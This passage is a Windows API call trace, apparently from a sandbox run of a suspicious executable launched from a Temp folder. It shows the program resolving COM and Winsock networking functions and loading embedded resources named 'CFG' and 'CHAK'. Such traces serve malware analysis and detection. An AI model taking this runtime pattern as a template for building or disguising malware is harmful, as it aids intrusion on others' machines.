lpProcName="VarCmp") returned 0x76c2b0dc [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarI4FromStr") returned 0x76c26fab [0112.694] GetProcAddress (hModule=0x76c10000, lpProcName="VarR4FromStr") returned 0x76c301a0 [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarR8FromStr") returned 0x76c2699e [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarDateFromStr") returned 0x76c36ba7 [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarCyFromStr") returned 0x76c56c12 [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarBoolFromStr") returned 0x76c2dbd1 [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromCy") returned 0x76c37fdc [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromDate") returned 0x76c27a2a [0112.695] GetProcAddress (hModule=0x76c10000, lpProcName="VarBstrFromBool") returned 0x76c30355 [0112.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x84 [0112.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x88 [0112.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8c [0112.695] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16948425000) returned 1 [0112.695] GetTickCount () returned 0x26fd2 [0112.695] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x94)) [0112.695] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x94)) [0112.695] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc28 | out: lpPerformanceCount=0x12fc28*=16948438600) returned 1 [0112.695] GetTickCount () returned 0x26fd2 [0112.695] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x94)) [0112.695] GetLocalTime (in: lpSystemTime=0x12fc20 | out: lpSystemTime=0x12fc20*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0x24, wSecond=0x1a, wMilliseconds=0x94)) [0112.695] GetModuleHandleW (lpModuleName="ole32.dll") returned 0x76750000 [0112.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0112.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoCreateInstanceEx", cchWideChar=18, lpMultiByteStr=0x13f82bc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoCreateInstanceEx", lpUsedDefaultChar=0x0) returned 18 [0112.695] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstanceEx") returned 0x76799d4e [0112.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0112.695] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoInitializeEx", cchWideChar=14, lpMultiByteStr=0x13e288c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoInitializeEx", lpUsedDefaultChar=0x0) returned 14 [0112.695] GetProcAddress (hModule=0x76750000, lpProcName="CoInitializeEx") returned 0x767909ad [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoAddRefServerProcess", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoAddRefServerProcess", lpUsedDefaultChar=0x0) returned 21 [0112.696] GetProcAddress (hModule=0x76750000, lpProcName="CoAddRefServerProcess") returned 0x767b3cf3 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoReleaseServerProcess", cchWideChar=22, lpMultiByteStr=0x13f82bc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoReleaseServerProcess", lpUsedDefaultChar=0x0) returned 22 [0112.696] GetProcAddress (hModule=0x76750000, lpProcName="CoReleaseServerProcess") returned 0x767b4314 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoResumeClassObjects", cchWideChar=20, lpMultiByteStr=0x13f82bc, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoResumeClassObjects", lpUsedDefaultChar=0x0) returned 20 [0112.696] GetProcAddress (hModule=0x76750000, lpProcName="CoResumeClassObjects") returned 0x7675ea02 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CoSuspendClassObjects", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CoSuspendClassObjects", lpUsedDefaultChar=0x0) returned 21 [0112.696] GetProcAddress (hModule=0x76750000, lpProcName="CoSuspendClassObjects") returned 0x767bbb02 [0112.696] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="InitializeConditionVariable", cchWideChar=27, lpMultiByteStr=0x13ff48c, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="InitializeConditionVariable", lpUsedDefaultChar=0x0) returned 27 [0112.696] GetProcAddress (hModule=0x76910000, lpProcName="InitializeConditionVariable") returned 0x77289981 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeConditionVariable", cchWideChar=21, lpMultiByteStr=0x13f82bc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeConditionVariable", lpUsedDefaultChar=0x0) returned 21 [0112.696] GetProcAddress (hModule=0x76910000, lpProcName="WakeConditionVariable") returned 0x772d5a7b [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="WakeAllConditionVariable", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WakeAllConditionVariable", lpUsedDefaultChar=0x0) returned 24 [0112.696] GetProcAddress (hModule=0x76910000, lpProcName="WakeAllConditionVariable") returned 0x772545a5 [0112.696] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0112.697] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SleepConditionVariableCS", cchWideChar=24, lpMultiByteStr=0x13ff48c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SleepConditionVariableCS", lpUsedDefaultChar=0x0) returned 24 [0112.697] GetProcAddress (hModule=0x76910000, lpProcName="SleepConditionVariableCS") returned 0x769418be [0112.697] GetThreadLocale () returned 0x409 [0112.697] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0112.697] GetCurrentThreadId () returned 0xd84 [0112.697] GetCurrentThreadId () returned 0xd84 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="2") returned 2 [0112.697] GetThreadLocale () returned 0x409 [0112.697] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0112.697] GetThreadLocale () returned 0x409 [0112.697] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0112.697] GetCurrentThreadId () returned 0xd84 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sun") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sunday") returned 7 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Mon") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Monday") returned 7 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tue") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Tuesday") returned 8 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wed") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Wednesday") returned 10 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thu") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Thursday") returned 9 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Fri") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Friday") returned 7 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Sat") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f7cc, cchData=256 | out: lpLCData="Saturday") returned 9 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jan") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="January") returned 8 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Feb") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="February") returned 9 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Mar") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="March") returned 6 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Apr") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="April") returned 6 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="May") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jun") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="June") returned 5 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Jul") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="July") returned 5 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Aug") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="August") returned 7 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Sep") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="September") returned 10 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Oct") returned 4 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="October") returned 8 [0112.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Nov") returned 4 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="November") returned 9 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="Dec") returned 4 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f7d0, cchData=256 | out: lpLCData="December") returned 9 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f820, cchData=256 | out: lpLCData="$") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fa18, cchData=2 | out: lpLCData=".") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f820, cchData=256 | out: lpLCData="2") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fa18, cchData=2 | out: lpLCData="/") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f7d8, cchData=256 | out: lpLCData="1") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fa18, cchData=2 | out: lpLCData=":") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f820, cchData=256 | out: lpLCData="AM") returned 3 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f820, cchData=256 | out: lpLCData="PM") returned 3 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f820, cchData=256 | out: lpLCData="0") returned 2 [0112.698] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fa18, cchData=2 | out: lpLCData=",") returned 2 [0112.698] LoadLibraryW (lpLibFileName="ws2_32.dll") returned 0x77380000 [0112.699] GetProcAddress (hModule=0x77380000, lpProcName="WSAIoctl") returned 0x77382fe7 [0112.699] GetProcAddress (hModule=0x77380000, lpProcName="__WSAFDIsSet") returned 0x77386a8a [0112.699] GetProcAddress (hModule=0x77380000, lpProcName="closesocket") returned 0x77383918 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="ioctlsocket") returned 0x77383084 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="WSAGetLastError") returned 0x773837ad [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="WSAStartup") returned 0x77383ab2 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="WSACleanup") returned 0x77383c5f [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="accept") returned 0x773868b6 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="bind") returned 0x77384582 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="connect") returned 0x77386bdd [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="getpeername") returned 0x77387147 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="getsockname") returned 0x773830af [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="getsockopt") returned 0x7738737d [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="htonl") returned 0x77382d57 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="htons") returned 0x77382d8b [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="inet_addr") returned 0x7738311b [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="inet_ntoa") returned 0x7738b131 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="listen") returned 0x7738b001 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="ntohl") returned 0x77382d57 [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="ntohs") returned 0x77382d8b [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="recv") returned 0x77386b0e [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="recvfrom") returned 0x7738b6dc [0112.700] GetProcAddress (hModule=0x77380000, lpProcName="select") returned 0x77386989 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="send") returned 0x77386f01 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="sendto") returned 0x773834b5 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="setsockopt") returned 0x773841b6 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="shutdown") returned 0x7738449d [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="socket") returned 0x77383eb8 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyaddr") returned 0x77396c01 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="gethostbyname") returned 0x77397673 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getprotobyname") returned 0x773968b3 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getprotobynumber") returned 0x773967c4 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getservbyname") returned 0x77396ef3 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getservbyport") returned 0x77396d62 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="gethostname") returned 0x7738a05b [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getaddrinfo") returned 0x77384296 [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="freeaddrinfo") returned 0x77384b1b [0112.701] GetProcAddress (hModule=0x77380000, lpProcName="getnameinfo") returned 0x773867b7 [0112.701] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x4e9ec0 | out: lpWSAData=0x4e9ec0) returned 0 [0112.706] GetACP () returned 0x4e4 [0112.706] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fc28 | out: lpCPInfo=0x12fc28) returned 1 [0112.706] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa5c, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.706] GetTickCount () returned 0x26fe1 [0112.706] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc38 | out: lpPerformanceCount=0x12fc38*=16949549879) returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x32\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x68\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x76\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x74\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x33\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x6c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.706] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x4c\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x72\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x54\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x43\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x57\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x59\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x31\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fc14, cbMultiByte=1, lpWideCharStr=0x12ebfc, cchWideChar=2047 | out: lpWideCharStr="\x48\x7730\xfc34\x12\xec70\x12\x8e20\x7728\xecbc\x12") returned 1 [0112.707] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0112.707] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0112.707] LoadStringW (in: hInstance=0x400000, uID=0xff66, lpBuffer=0x12dbd4, cchBufferMax=4096 | out: lpBuffer="32-bit Edition") returned 0xe [0112.707] LoadStringW (in: hInstance=0x400000, uID=0xff65, lpBuffer=0x12dbd0, cchBufferMax=4096 | out: lpBuffer="%s Service Pack %4:d (Version %1:d.%2:d, Build %3:d, %5:s)") returned 0x3a [0112.707] FindResourceW (hModule=0x400000, lpName="CFG", lpType=0xa) returned 0x51c308 [0112.707] LoadResource (hModule=0x400000, hResInfo=0x51c308) returned 0x50d55c [0112.707] SizeofResource (hModule=0x400000, hResInfo=0x51c308) returned 0xef [0112.707] LockResource (hResData=0x50d55c) returned 0x50d55c [0112.707] FreeResource (hResData=0x50d55c) returned 0 [0112.707] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.707] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.707] SizeofResource (hModule=0x400000, 